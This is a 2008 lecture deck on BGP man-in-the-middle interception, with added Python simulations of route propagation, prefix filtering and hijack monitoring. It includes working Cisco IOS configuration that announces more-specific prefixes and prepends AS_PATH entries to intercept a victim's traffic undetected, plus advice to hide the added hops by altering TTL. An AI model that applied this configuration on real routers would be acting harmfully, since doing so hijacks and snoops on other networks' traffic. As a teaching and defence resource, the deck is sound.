BGP Man in the Middle Attack Jason Froehlich December 10, 2008.


2 What is BGP?
  - The routing protocol of the whole Internet: it carries reachability information between Autonomous Systems (AS)
  - Classless Interdomain Routing (CIDR): a prefix plus a length, e.g. 190.100.0.0/16 = network 190.100.0.0 with mask 255.255.0.0

3 How BGP Works
  - AS border router ("BGP speaker"): advertises the AS's own routes and redistributes the routes it learns from neighbours
  - Update messages carry the "AS_PATH" attribute, the list of ASes the route has passed through; each speaker prepends its own AS number when it re-advertises a route
  - Path selection: forwarding uses the most specific (longest) matching prefix, so a route for 190.100.0.0/17 wins over 190.100.0.0/16 for every address it covers

4 The Man in the Middle Attack
  Requirements:
  - Redirect all traffic for the target to the attacker
  - Forward that traffic on to the target, so the victim sees no outage
  Relies on the trust built into BGP: a speaker accepts whatever its peers announce

5 Attack Threats
  - Confidentiality: capture every packet sent to the target
  - Integrity: modify packets before delivering them
  - Availability: black-hole the traffic, or filter selected packets

6 Implementation
  - Target: 190.100.0.0/16, originated by AS100
  - Attacker: AS900

7 Implementation – Step 1
  Advertise new, more specific routes for the target's address space: 190.100.0.0/17 and 190.100.128.0/17. Because the longest matching prefix wins, every AS that accepts them now sends the target's traffic to AS900.

8 Implementation – Step 1
  Attacker's router configuration (Cisco IOS). The slide elides the peer addresses and the rest of the configuration; <...-peer-ip> is a placeholder, not a value from the slide.

    router bgp 900
     ! originate the two more-specific halves of the target's /16
     ! (a "network" statement needs a matching route in the routing table;
     ! the static routes of Step 2 provide it)
     network 190.100.0.0 mask 255.255.128.0
     network 190.100.128.0 mask 255.255.128.0
     ...
     neighbor <as600-peer-ip> remote-as 600
     neighbor <as700-peer-ip> remote-as 700
     neighbor <as800-peer-ip> remote-as 800
     ! stop IOS from collapsing the /17s back into the classful 190.100.0.0/16
     no auto-summary

9 Implementation – Step 2
  Create a route back to the target. AS900 still needs a clean path to 190.100.0.0/16, but every AS that accepted the /17s would send that traffic straight back to AS900. BGP's loop prevention solves this: a speaker discards any update whose AS_PATH already contains its own AS number. The attacker therefore modifies the AS_PATH of the bogus /17 advertisements by adding each AS on the route to the target (here 600, 300 and 100). Those ASes reject the announcement, keep the legitimate /16, and carry the forwarded traffic to the target, while everyone else routes through AS900.

10 Implementation – Step 2
  Attacker's router configuration, continued. The next hops are elided on the slide; <as600-peer-ip> is a placeholder. The route map has to be applied outbound to the neighbours, and the prefix list must match the /17s (an exact /16 entry would not), so those two details are filled in here.

    ! match the two /17s carved out of the target's /16
    ip prefix-list victim permit 190.100.0.0/16 ge 17 le 17
    !
    route-map mitm permit 10
     match ip address prefix-list victim
     ! prepend the ASes on the return path; with the local AS added the
     ! advertised path reads "900 600 300 100", so AS600, AS300 and AS100 drop it
     set as-path prepend 600 300 100
    !
    router bgp 900
     neighbor <as600-peer-ip> route-map mitm out
     neighbor <as700-peer-ip> route-map mitm out
     neighbor <as800-peer-ip> route-map mitm out
    !
    ! static routes for the /17s: they satisfy the "network" statements and send
    ! intercepted traffic towards AS600, which still holds the real /16 route
    ip route 190.100.0.0 255.255.128.0 <as600-peer-ip>
    ip route 190.100.128.0 255.255.128.0 <as600-peer-ip>
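The two steps above, played out as an added example that is not part of the original slides: a toy BGP propagation model in which every AS re-advertises its best (shortest AS_PATH) route to every neighbour, discards updates that already carry its own AS number, and forwards by longest prefix match (slide 3). The topology is an assumption made for the example: AS100 (the target) - AS300 - AS600 - AS900 (the attacker), with AS700 and AS800 peering only with AS900. Running it with the prepend of Step 2 delivers AS700's packets to the target through AS900, AS600 and AS300; running it without the prepend shows why Step 2 is needed.

```python
"""Toy BGP propagation model for the slides' Steps 1 and 2 (added example).

Constructed topology (assumption, not from the slides):
    AS100 (target, owns 190.100.0.0/16) -- AS300 -- AS600 -- AS900 (attacker)
    AS900 also peers with AS700 and AS800.
Simplifications: best path = shortest AS_PATH, every AS relays its best
route to every neighbour, forwarding = longest-prefix match.
"""
import ipaddress

LINKS = [(100, 300), (300, 600), (600, 900), (900, 700), (900, 800)]
VICTIM = "190.100.0.0/16"
HIJACKS = ["190.100.0.0/17", "190.100.128.0/17"]


def neighbours(asn):
    return [b if a == asn else a for a, b in LINKS if asn in (a, b)]


def propagate(origins):
    """origins: {asn: [(prefix, prepend_path)]}. A locally originated route is
    stored with next_hop None; when advertised, the sender puts its own ASN in
    front of the stored path. Returns {asn: {prefix: (as_path, next_hop_asn)}}."""
    rib = {asn: {} for a, b in LINKS for asn in (a, b)}
    for asn, routes in origins.items():
        for prefix, path in routes:
            rib[asn][prefix] = (path, None)
    changed = True
    while changed:
        changed = False
        for asn in list(rib):
            for prefix, (path, _) in list(rib[asn].items()):
                adv = (asn,) + path
                for nb in neighbours(asn):
                    if nb in adv:        # loop prevention: own ASN already in AS_PATH
                        continue
                    cur = rib[nb].get(prefix)
                    if cur is None or (cur[1] is not None and len(adv) < len(cur[0])):
                        rib[nb][prefix] = (adv, asn)
                        changed = True
    return rib


def lookup(table, addr):
    """Longest-prefix match: a /17 beats the /16 for any address it covers."""
    ip = ipaddress.ip_address(addr)
    best = None
    for prefix, route in table.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, route)
    return None if best is None else (str(best[0]), best[1])


def trace(rib, src, addr, attacker):
    """Hop-by-hop forwarding from AS `src` towards `addr`. At the attacker, a
    locally originated hijack prefix is forwarded on via the route for the
    legitimate /16 (the static route of Step 2). Returns (hops, status)."""
    hops, asn = [src], src
    while True:
        match = lookup(rib[asn], addr)
        if match is None:
            return hops, "no-route"
        prefix, (_, nh) = match
        if nh is None:
            if asn != attacker or prefix == VICTIM:
                return hops, "delivered"      # reached the origin of the route
            nh = rib[asn][VICTIM][1]           # attacker hands off via the real /16
        hops.append(nh)
        if hops.count(nh) > 1:
            return hops, "loop"
        asn = nh


def simulate(prepend):
    """prepend=(600, 300, 100) models `set as-path prepend 600 300 100`;
    prepend=() is a naive more-specific hijack with no return path."""
    origins = {100: [(VICTIM, ())], 900: [(p, prepend) for p in HIJACKS]}
    rib = propagate(origins)
    hops, status = trace(rib, 700, "190.100.5.5", attacker=900)
    hijacked = sorted(asn for asn in rib if HIJACKS[0] in rib[asn])
    return {"hops": hops, "status": status, "hijacked": hijacked}


if __name__ == "__main__":
    for label, prepend in (("naive hijack", ()), ("with AS_PATH prepend", (600, 300, 100))):
        r = simulate(prepend)
        print(f"{label}: {r['status']} via {r['hops']}; ASes holding the /17: {r['hijacked']}")
```

Without the prepend, AS600 accepts the /17 and the packet bounces between AS900 and AS600; with it, only AS700, AS800 and the attacker hold the /17, and the return path AS600, AS300, AS100 stays clean, which is exactly what makes the interception transparent.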

11 Attack Limitations
  - Access to a BGP router: rules out script kiddies, but the pool of people with a BGP session is still large
  - Half of the conversation: the attacker sees only traffic inbound to the target; the target's replies take the normal path. Resolve with a second BGP MITM against the other end, or another MITM technique (e.g. DNS)
  - Incomplete route distribution: the ASes on the return path (and anyone routing through them) never accept the bogus route, so their traffic is not intercepted

12 Attack Limitations cont.
  - Packet route visible: traceroute shows the extra hops through the attacker. Resolve with TTL modification on the attacker's routers so those hops do not show up
  - BGP updates visible: the announcements may alert a perceptive administrator
  - Encrypted traffic: the attacker can capture and redirect it but cannot decrypt the payload

13 Mitigating the Attack - Prevention
  - Filtering: an ISP accepts from each customer only the prefixes that customer is entitled to announce. Must be done by every ISP to be effective
  - Internet Routing Registry: the data such filters are built from. Overhead, and poor database maintenance and security, limit its value

14 Mitigating the Attack - Detection
  - Monitor BGP updates for your own prefixes as seen from outside your AS: new origins, new more-specific prefixes, unexpected paths
  - BGPmon.net
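The prevention and detection slides above, as an added example that is not part of the original slides: a per-customer prefix filter of the kind an ISP would build from registry data, and a monitor over collector-visible updates that raises the alerts a prefix owner would want. The registry contents, the neighbour set of AS100, and the update records are all constructed for the example; only the ASNs and prefixes follow the slides. Note that the slides' two-step attack produces an AS_PATH that ends in the legitimate origin, so the only rule that catches it is the one about an unannounced more-specific prefix.

```python
"""Added example: ISP-side prefix filter and owner-side update monitor."""
from ipaddress import ip_network

# --- (1) ISP-side filter: what each customer ASN may announce and the longest
#     prefix length accepted (like an IRR route object plus an "le" limit).
#     Constructed registry extract, not real data.
REGISTRY = {
    100: [("190.100.0.0/16", 16)],   # the target announces only its /16
    900: [("203.0.113.0/24", 24)],   # the attacker's own legitimate space
}


def permitted(customer_asn, prefix):
    """Would the ISP accept `prefix` from this customer?"""
    net = ip_network(prefix)
    for allowed, max_len in REGISTRY.get(customer_asn, []):
        allowed_net = ip_network(allowed)
        if net.subnet_of(allowed_net) and net.prefixlen <= max_len:
            return True
    return False


# --- (2) Owner-side monitor (BGPmon-style) for AS100.
OWN_ASN = 100
OWN_PREFIXES = ["190.100.0.0/16"]
OWN_NEIGHBOURS = {300}    # ASes we really have a session with (constructed)


def check_update(prefix, as_path):
    """as_path: list of ASNs, collector peer first, origin last.
    Returns alert tags; empty list means nothing suspicious."""
    net = ip_network(prefix)
    covering = [ip_network(p) for p in OWN_PREFIXES if net.subnet_of(ip_network(p))]
    if not covering:
        return []                                   # not our address space
    own_net = covering[0]
    alerts = []
    if net != own_net:
        alerts.append("more-specific")              # Step 1, whatever origin it claims
    elif as_path[-1] != OWN_ASN:
        alerts.append("origin-change")              # plain whole-prefix hijack
    if OWN_ASN in as_path:
        idx = as_path.index(OWN_ASN)
        if idx > 0 and as_path[idx - 1] not in OWN_NEIGHBOURS:
            alerts.append("unexpected-neighbour")   # forged adjacency next to our AS
    return alerts


# Constructed collector feed: (prefix, AS_PATH as text).
UPDATES = [
    ("190.100.0.0/16", "700 900 600 300 100"),    # legitimate /16 seen via AS700
    ("190.100.0.0/17", "700 900 600 300 100"),    # Step 1 + 2 hijack: origin looks right
    ("190.100.128.0/17", "700 900"),              # naive hijack, attacker as origin
    ("190.100.0.0/16", "800 900"),                # whole-prefix hijack
    ("190.100.0.0/16", "800 900 500 100"),        # forged adjacency 500-100
    ("203.0.113.0/24", "800 900"),                # unrelated prefix
]


def scan(updates=UPDATES):
    """Run the monitor over a feed; keys are "prefix via path"."""
    return {f"{p} via {path}": check_update(p, [int(a) for a in path.split()])
            for p, path in updates}


if __name__ == "__main__":
    print("AS900 may announce 190.100.0.0/17:", permitted(900, "190.100.0.0/17"))
    for key, alerts in scan().items():
        print(f"{key}: {alerts or 'ok'}")
```

The filter is what the prevention slide asks every ISP to run: AS600, AS700 and AS800 would each reject the /17s at the session with AS900, and the attack never starts. The monitor is the fallback when they do not.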

15 Mitigating the Attack - Response
  - Counter-attack: advertise even more specific networks (e.g. /18s) so the longest-match preference swings back to the legitimate origin
  - ISP disconnects the attacker: may take hours to days. Example: the YouTube.com prefix hijack, February 2008

16 Mitigating the Attack – Securing BGP
  - S-BGP: two certificate hierarchies, one for IP address allocation and one for AS numbers, so both the origin and the path of an advertisement can be verified
  - Secure Origin BGP (soBGP): verifies the origin and checks advertised paths against known topologies
  - Interdomain Route Validation (IRV): out-of-band verification of received routes with the ASes named in the path

17 Conclusion
  BGP man in the middle is a powerful attack: easy to implement for anyone who controls a BGP speaker, and difficult to mitigate with the protocol as deployed today.
